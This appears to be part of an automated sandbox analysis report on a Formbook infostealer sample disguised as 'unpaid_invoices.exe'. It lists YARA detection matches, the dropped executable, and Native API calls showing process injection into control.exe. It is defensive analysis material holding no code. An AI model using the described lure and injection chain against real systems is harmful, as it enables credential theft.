          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: unpaid_invoices.exe
          Executable has a suspicious name (potential lure to open the executable)
          Source: unpaid_invoices.exeStatic file information: Suspicious name
          Source: unpaid_invoices.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E118A01_2_00E118A0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E196B01_2_00E196B0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E17E991_2_00E17E99
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E19C221_2_00E19C22
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E1B4011_2_00E1B401
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E1C3CD1_2_00E1C3CD
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E1A1941_2_00E1A194
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0040926B2_2_0040926B
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_004092702_2_00409270
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0040DC0B2_2_0040DC0B
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0040DC102_2_0040DC10
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041EFA72_2_0041EFA7
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041E7BA2_2_0041E7BA
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E118A02_2_00E118A0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E1A1942_2_00E1A194
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E1C3CD2_2_00E1C3CD
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E19C222_2_00E19C22
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E1B4012_2_00E1B401
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E196B02_2_00E196B0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E17E992_2_00E17E99
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDB09017_2_04BDB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD841F17_2_04BD841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C8100217_2_04C81002
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC0D2017_2_04BC0D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C91D5517_2_04C91D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE412017_2_04BE4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCF90017_2_04BCF900
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE6E3017_2_04BE6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFEBB017_2_04BFEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EE926B17_2_02EE926B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EE927017_2_02EE9270
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFEFA717_2_02EFEFA7
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFE7BA17_2_02EFE7BA
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EE2FB017_2_02EE2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EEDC0B17_2_02EEDC0B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EEDC1017_2_02EEDC10
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EE2D9017_2_02EE2D90
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: String function: 00E145A9 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: String function: 00E12410 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A310 NtCreateFile,2_2_0041A310
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A3C0 NtReadFile,2_2_0041A3C0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A440 NtClose,2_2_0041A440
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A4F0 NtAllocateVirtualMemory,2_2_0041A4F0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A368 NtReadFile,2_2_0041A368
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A30A NtCreateFile,2_2_0041A30A
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A43A NtClose,2_2_0041A43A
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041A4EA NtAllocateVirtualMemory,2_2_0041A4EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09840 NtDelayExecution,LdrInitializeThunk,17_2_04C09840
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09860 NtQuerySystemInformation,LdrInitializeThunk,17_2_04C09860
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C095D0 NtClose,LdrInitializeThunk,17_2_04C095D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C099A0 NtCreateSection,LdrInitializeThunk,17_2_04C099A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09540 NtReadFile,LdrInitializeThunk,17_2_04C09540
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_04C09910
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C096D0 NtCreateKey,LdrInitializeThunk,17_2_04C096D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C096E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_04C096E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09650 NtQueryValueKey,LdrInitializeThunk,17_2_04C09650
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A50 NtCreateFile,LdrInitializeThunk,17_2_04C09A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_04C09660
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09FE0 NtCreateMutant,LdrInitializeThunk,17_2_04C09FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09780 NtMapViewOfSection,LdrInitializeThunk,17_2_04C09780
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09710 NtQueryInformationToken,LdrInitializeThunk,17_2_04C09710
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C098F0 NtReadVirtualMemory,17_2_04C098F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C098A0 NtWriteVirtualMemory,17_2_04C098A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0B040 NtSuspendThread,17_2_04C0B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09820 NtEnumerateKey,17_2_04C09820
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C099D0 NtCreateProcessEx,17_2_04C099D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C095F0 NtQueryInformationFile,17_2_04C095F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09950 NtQueueApcThread,17_2_04C09950
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09560 NtWriteFile,17_2_04C09560
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09520 NtWaitForSingleObject,17_2_04C09520
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0AD30 NtSetContextThread,17_2_04C0AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A80 NtOpenDirectoryObject,17_2_04C09A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09670 NtQueryInformationProcess,17_2_04C09670
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A00 NtProtectVirtualMemory,17_2_04C09A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09610 NtEnumerateValueKey,17_2_04C09610
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A10 NtQuerySection,17_2_04C09A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09A20 NtResumeThread,17_2_04C09A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C097A0 NtUnmapViewOfSection,17_2_04C097A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0A3B0 NtGetContextThread,17_2_04C0A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09760 NtOpenProcess,17_2_04C09760
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09770 NtSetInformationFile,17_2_04C09770
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0A770 NtOpenThread,17_2_04C0A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09B00 NtSetValueKey,17_2_04C09B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0A710 NtOpenProcessToken,17_2_04C0A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C09730 NtQueryVirtualMemory,17_2_04C09730
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA3C0 NtReadFile,17_2_02EFA3C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA310 NtCreateFile,17_2_02EFA310
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA4F0 NtAllocateVirtualMemory,17_2_02EFA4F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA440 NtClose,17_2_02EFA440
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA368 NtReadFile,17_2_02EFA368
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA30A NtCreateFile,17_2_02EFA30A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA4EA NtAllocateVirtualMemory,17_2_02EFA4EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFA43A NtClose,17_2_02EFA43A
          Source: unpaid_invoices.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile read: C:\Users\user\Desktop\unpaid_invoices.exeJump to behavior
          Source: unpaid_invoices.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\unpaid_invoices.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\unpaid_invoices.exe "C:\Users\user\Desktop\unpaid_invoices.exe"
